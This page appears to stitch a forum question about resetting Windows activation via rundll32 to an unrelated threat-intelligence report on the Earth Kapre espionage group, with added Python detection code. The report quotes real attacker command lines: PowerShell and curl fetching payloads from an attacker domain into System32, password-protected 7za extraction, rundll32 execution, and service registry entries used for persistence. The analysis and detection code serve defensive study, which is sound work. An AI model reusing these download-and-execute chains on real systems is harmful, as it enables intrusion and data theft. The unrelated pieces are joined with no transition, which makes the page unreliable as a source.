How To Fix C Windows System32 Rundll32.exe


Alfonzo Liebenstein

Jul 10, 2024, 4:31:05 PM
to lolotigi

Now when I start Windows from the new disk I get: "Since Windows was first activated on this computer, the hardware on the computer has changed significantly. Due to these changes, Windows must be reactivated within 3 days. Do you want to reactivate Windows now?"

Most pointers on the internet say that you can activate over the phone, which I would gladly do (I even have my product ID), but for this to work you have to be logged in. In my case, regardless of how I reply to this message, it just logs me out.

I also found several references that said that running rundll32.exe syssetup,SetupOobeBnk would reset the activation and allow me to login so I could complete the over the phone activation, but I am guessing this would work on the running OS.

I was wondering if there is a way to cause rundll32.exe syssetup,SetupOobeBnk to run on a Windows installation that is not the currently running one but is on a disk connected to a machine running Windows? I.e., can I use another computer that has the OS to force the OS on some hard drive into the 30-day trial before activation?

The espionage group Earth Kapre (aka RedCurl and Red Wolf) has been actively conducting phishing campaigns targeting organizations in Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the US. It uses phishing emails that contain malicious attachments (.iso and .img), which lead to successful infections upon opening. This triggers the creation of a scheduled task for persistence, alongside the unauthorized collection and transmission of sensitive data to command-and-control (C&C) servers.

The Trend Micro Managed Extended Detection and Response (MDR) and Incident Response (IR) team conducted an investigation of an incident where numerous machines were infected by the Earth Kapre downloader. This piece of malware was observed establishing connections with its C&C servers, suggesting a potential data theft scenario. Interestingly, in this instance, Earth Kapre has returned to using a previously known technique that is distinct from its more recent campaigns: it used the legitimate tools PowerShell.exe and curl.exe to procure the subsequent stage downloader. In an attempt to blend into the network and evade detection, Earth Kapre was found to have used the Program Compatibility Assistant (pcalua.exe) to execute malicious command lines.

This blog entry will examine Trend Micro MDR team's investigation that successfully uncovered the intrusion sets employed by Earth Kapre in a recent incident, as well as how the team leveraged threat intelligence to attribute the extracted evidence to the cyberespionage threat group.

The Trend Micro MDR threat hunting team initially detected the creation of a suspicious file in C:\Windows\System32\ms.dll (detected by Trend Micro as Trojan.Win64.CRUDLER.A). Further investigation revealed the use of curl.exe to download the file from the following URLs:

We observed that the initial command employs PowerShell to download a file (curl.tmp) from the URL [.]melaniebest[.]com/ms/curl.tmp and saves it as curl.exe in the C:\Windows\System32\ directory. For the benefit of this analysis, we will use this domain, but the same analysis should hold for the other domains in the previously mentioned list of URLs. Curl.exe is a command-line tool and library designed for efficient data transfer with URLs. While it is a legitimate tool, it can also be abused by threat actors for malicious purposes.

%COMSPEC% /Q /c echo powershell -c "iwr -Uri [.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat

C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe [.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat

The Earth Kapre loader was then downloaded using curl.exe from the same domain, [.]melaniebest[.]com/ms/ms.tmp, and was saved as ms.dll (though it should be noted that on some machines, the file name used was ps.dll) in the C:\Windows\System32\ directory. The threat actors used echo (as also seen in the previous commands) to write the command into a batch file, a commonly employed obfuscation technique. By echoing the command into a batch file, they could dynamically generate and execute commands, making the activity harder to analyze or detect. The use of temporary batch files also allows for task automation and easier evasion of security monitoring. We observed that the threat actors deleted the batch file afterward to cover their tracks.

C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll [.]melaniebest.com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat

C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA

The Python script was crafted to establish outbound communication and execute remote commands using Server Message Block (SMB) via port 445. During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86, is passed as a command-line argument, suggesting its potential role as a C&C server.

Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\aQpzRMnIku
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat
Registry value type: 2

Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\kPbzlGKCyO
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:\Windows\System32\ms.dll ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > %TEMP%\DFMPAa.bat & %COMSPEC% /Q /c %TEMP%\DFMPAa.bat & %COMSPEC% /Q /c del %TEMP%\DFMPAa.bat
Registry value type: 2

Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\lzZqdAEwKP
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:\Windows\System32\7za.exe ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c del %TEMP%\IAqJUm.bat
Registry value type: 2

We identified a command that appears to use netstat to check for an open port 4119. The purpose of this command might involve gathering network connection information linked to the specified port or checking for a specific pattern in the netstat output. Port 4119 serves as the Trend Micro Deep Security Manager GUI and API port, suggesting that the threat actor could be verifying the presence of the security program on this machine.

Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\zOMISPlXbL
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo netstat -an find "4119" ^> \\127.0.0.1\C$\SspgqD 2^>^&1 > %TEMP%\MjHubF.bat & %COMSPEC% /Q /c %TEMP%\MjHubF.bat & %COMSPEC% /Q /c del %TEMP%\MjHubF.bat
Registry value type: 2
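The command lines quoted above and the service ImagePath records share one wrapper: `echo <command> ^> \\127.0.0.1\C$\<random> 2^>^&1 > <temp>.bat`, then run the .bat, then delete it. A detection engineer reviewing process-creation or service-installation telemetry wants to peel that wrapper off, recover the inner command, and classify it. The following Python is an added example and is not code from the Trend Micro write-up; it takes the exact command lines and ImagePath values quoted above as constructed sample input (the two "benign" rows are made up for contrast), decodes the wrapper with regular expressions, and flags services whose names look generated. The 10-letter, mixed-case service-name heuristic is an assumption drawn from the three names on this page, not a rule stated by the authors.

```python
import re
from typing import Optional

# Constructed sample telemetry. The three process command lines and the two
# service ImagePath values are the ones quoted in the write-up above; the
# rows marked benign are made up here for contrast.
PROCESS_CMDLINES = [
    r'%COMSPEC% /Q /c echo powershell -c "iwr -Uri [.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat',
    r'C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll [.]melaniebest.com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat',
    r'C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat',
    r'C:\Windows\system32\cmd.exe /c dir C:\Users',  # benign (constructed)
]
SERVICE_RECORDS = [  # (service name, ImagePath value)
    ("aQpzRMnIku", r'%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat'),
    ("zOMISPlXbL", r'%COMSPEC% /Q /c echo netstat -an find "4119" ^> \\127.0.0.1\C$\SspgqD 2^>^&1 > %TEMP%\MjHubF.bat & %COMSPEC% /Q /c %TEMP%\MjHubF.bat & %COMSPEC% /Q /c del %TEMP%\MjHubF.bat'),
    ("Spooler", r'C:\Windows\System32\spoolsv.exe'),  # benign (constructed)
]

# The wrapper: echo <inner> ^> \\127.0.0.1\<drive>$\<random> 2^>^&1 > <tmp>.bat
WRAPPER_RE = re.compile(
    r'/Q\s+/c\s+echo\s+(?P<inner>.+?)\s+\^>\s+'
    r'(?P<share>\\\\127\.0\.0\.1\\[A-Za-z]\$\\\S+)\s+2\^>\^&1\s+>\s+(?P<bat>\S+\.bat)',
    re.IGNORECASE,
)
# Classifiers for the inner command; each one recovers the artefacts an analyst needs.
CURL_RE = re.compile(r'^curl\s+-o\s+(?P<dest>\S+)\s+(?P<url>\S+)', re.I)
IWR_RE = re.compile(r'iwr\s+-Uri\s+(?P<url>\S+)\s+-OutFile\s+(?P<dest>\S+)', re.I)
SEVENZ_RE = re.compile(r'^7za\.exe\s+x\b.*?-p(?P<pwd>\S+)\s+(?P<archive>\S+)', re.I)
RUNDLL_RE = re.compile(r'^rundll32\.exe\s+(?P<dll>[^,\s]+),(?P<export>\S+)', re.I)
# The quoted record shows "netstat -an find", without a pipe, so the pipe is optional here.
NETSTAT_RE = re.compile(r'^netstat\b.*?find\s+"(?P<needle>[^"]+)"', re.I)
# Service launched straight from cmd.exe / %COMSPEC% rather than a service binary.
LAUNCHER_RE = re.compile(r'^\s*(?:%COMSPEC%|(?:\S*\\)?cmd\.exe)(?:\s|$)', re.I)
TEN_LETTERS_RE = re.compile(r'^[A-Za-z]{10}$')


def decode_wrapper(cmdline: str) -> Optional[dict]:
    """Return the inner command plus its artefacts, or None if the line
    does not use the echo-to-.bat wrapper."""
    m = WRAPPER_RE.search(cmdline)
    if not m:
        return None
    inner = m.group("inner").strip()
    finding = {"kind": "wrapped_command", "inner": inner,
               "loopback_share": m.group("share"), "batch": m.group("bat")}
    if (c := CURL_RE.search(inner)):
        finding.update(kind="download", tool="curl", url=c["url"], dest=c["dest"])
    elif (i := IWR_RE.search(inner)):
        finding.update(kind="download", tool="powershell", url=i["url"], dest=i["dest"])
    elif (z := SEVENZ_RE.search(inner)):
        finding.update(kind="extract", tool="7za", archive=z["archive"], password=z["pwd"])
    elif (r := RUNDLL_RE.search(inner)):
        finding.update(kind="execute", tool="rundll32", dll=r["dll"], export=r["export"])
    elif (n := NETSTAT_RE.search(inner)):
        finding.update(kind="recon", tool="netstat", needle=n["needle"])
    return finding


def looks_generated(name: str) -> bool:
    """Heuristic (assumption, not from the write-up): exactly ten letters with
    frequent case flips, as in aQpzRMnIku; real service names rarely look like that."""
    if not TEN_LETTERS_RE.match(name):
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 3


def audit_service(name: str, image_path: str) -> Optional[dict]:
    """Flag a service whose ImagePath is a cmd.exe one-liner, uses the wrapper,
    or whose name looks generated; return None for an unremarkable record."""
    decoded = decode_wrapper(image_path)
    launcher = LAUNCHER_RE.match(image_path) is not None
    generated = looks_generated(name)
    if decoded is None and not launcher and not generated:
        return None
    return {"service": name, "generated_name": generated,
            "cmd_launcher": launcher, "decoded": decoded}


def scan(cmdlines, services) -> list:
    """Run both checks over the sample telemetry and collect the findings."""
    findings = [f for f in (decode_wrapper(c) for c in cmdlines) if f]
    findings += [s for s in (audit_service(n, p) for n, p in services) if s]
    return findings


if __name__ == "__main__":
    for f in scan(PROCESS_CMDLINES, SERVICE_RECORDS):
        print(f)
```

The decoder deliberately keys on the loopback share (`\\127.0.0.1\C$\...`) and the `2^>^&1` redirection rather than on any file name, since the .bat names and share file names were different on every machine; the inner command is what carries the stable indicators (download URL, destination path, DLL export, netstat needle).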

The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs. Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.

The Earth Kapre downloader has been distributed across various locations under randomly generated or obfuscated file names. The following are some enumerated examples that we discovered in our investigation:

In the following screenshot example, the file gkcb92eb2f8982d93a.exe, which was spawned by pcalua.exe, is observed establishing a connection to preston[.]melaniebest[.]com, the same domain discussed in the previous section.

By analyzing the acquired Earth Kapre downloader sample file, we have confirmed that the InternetOpenA and InternetConnectA API functions were used. These functions facilitate HTTP requests and verify the presence of a network connection.

Scheduled tasks were installed for persistence, as illustrated in Figure 7, where various tasks commenced before the Earth Kapre downloader file was executed. Figure 7 further reveals the execution of the suspicious task CacheTask ef07b190e6e6d160 just before the Earth Kapre downloader was executed.

The task names, file names, and file locations differ on each machine. Figure 8 displays evidence of malicious scheduled tasks that execute C:\Users\\AppData\Local\Sysmain\oxdece5f42fddfbde1.exe on an hourly basis.

The created task name varies per machine, but it incorporates a segment of the associated Earth Kapre downloader file name. For instance, if the file name is ef07b190e6e6d160.exe, the scheduled task will be named CacheTask ef07b190e6e6d160. Table 1 displays examples of task names created across the infected machines in the network.
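The two observations above, that the task name embeds a segment of the downloader file name (CacheTask ef07b190e6e6d160 for ef07b190e6e6d160.exe) and that the downloader was spawned via pcalua.exe, can be turned into a correlation over scheduled-task and process-creation records. The following Python is an added example, not code from the write-up; it assumes the shared segment is the 16-hex-character run visible in the file names on this page (ef07b190e6e6d160, cb92eb2f8982d93a inside gkcb92eb2f8982d93a.exe, dece5f42fddfbde1 inside oxdece5f42fddfbde1.exe). The user names, the second task name and the benign rows in the sample data are constructed.

```python
import re
from typing import Optional

HEX16_RE = re.compile(r'[0-9a-f]{16}', re.I)
# Binaries under a user profile's AppData are where the downloader was found;
# a scheduled task pointing there deserves a look regardless of its name.
USER_PROFILE_RE = re.compile(r'^[A-Za-z]:\\Users\\[^\\]+\\AppData\\', re.I)

# Constructed sample telemetry modelled on the observations above. The hex
# tokens are the ones named in the write-up; user names, the second task name
# and the benign rows are made up.
SCHEDULED_TASKS = [
    {"name": "CacheTask ef07b190e6e6d160", "schedule": "hourly",
     "action": r"C:\Users\alice\AppData\Local\Sysmain\ef07b190e6e6d160.exe"},
    {"name": "CacheTask dece5f42fddfbde1", "schedule": "hourly",
     "action": r"C:\Users\bob\AppData\Local\Sysmain\oxdece5f42fddfbde1.exe"},
    {"name": "OneDrive Standalone Update", "schedule": "daily",  # benign (constructed)
     "action": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"},
]
PROCESS_EVENTS = [
    {"image": r"C:\Users\carol\AppData\Local\Sysmain\gkcb92eb2f8982d93a.exe",
     "parent": r"C:\Windows\System32\pcalua.exe"},
    {"image": r"C:\Users\alice\AppData\Local\Sysmain\ef07b190e6e6d160.exe",
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",  # benign (constructed)
     "parent": r"C:\Windows\explorer.exe"},
]


def file_token(path: str) -> Optional[str]:
    """16-hex-character run in the file stem (ignores any letter prefix such as gk/ox)."""
    stem = path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    m = HEX16_RE.search(stem)
    return m.group(0).lower() if m else None


def task_token(name: str) -> Optional[str]:
    """Same run inside a scheduled-task name."""
    m = HEX16_RE.search(name)
    return m.group(0).lower() if m else None


def correlate(tasks, processes) -> list:
    findings = []
    # 1. Task whose name carries the token of its own action binary, with the
    #    binary living under a user profile rather than Program Files/System32.
    for t in tasks:
        tok = task_token(t["name"])
        if tok and tok == file_token(t["action"]) and USER_PROFILE_RE.match(t["action"]):
            findings.append({"type": "persistence_task", "task": t["name"],
                             "token": tok, "image": t["action"]})
    # 2. Binary under a user profile started through pcalua.exe (proxy execution).
    for p in processes:
        if p["parent"].lower().endswith("\\pcalua.exe") and USER_PROFILE_RE.match(p["image"]):
            findings.append({"type": "pcalua_proxy_exec", "token": file_token(p["image"]),
                             "image": p["image"], "parent": p["parent"]})
    # 3. Any process whose token matches a flagged task: ties execution to persistence.
    task_tokens = {f["token"] for f in findings if f["type"] == "persistence_task"}
    for p in processes:
        tok = file_token(p["image"])
        if tok in task_tokens:
            findings.append({"type": "task_linked_process", "token": tok, "image": p["image"]})
    return findings


if __name__ == "__main__":
    for f in correlate(SCHEDULED_TASKS, PROCESS_EVENTS):
        print(f)
```

Matching on the hex token rather than on the literal name "CacheTask" keeps the check useful when the task-name prefix changes between machines, which the write-up says it does; the pcalua.exe parent check stands on its own and does not depend on the token at all.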

Given that the identified patient-zero machines lacked Trend Micro XDR installation, we had limited visibility when tracing the point of entry for the attack. To address this gap, we attempted to complete the chain by identifying a similar infrastructure observed in the incident. Utilizing the IP address 23[.]254[.]224[.]79 from our investigation, we systematically pivoted across various data points through cyberthreat intelligence and deduced that the initial access was delivered via a phishing email carrying a malicious attachment. The Earth Kapre samples found in the wild, including the one used in this attack, share the same infrastructure and are often delivered through malicious ISO or IMG files received via email.
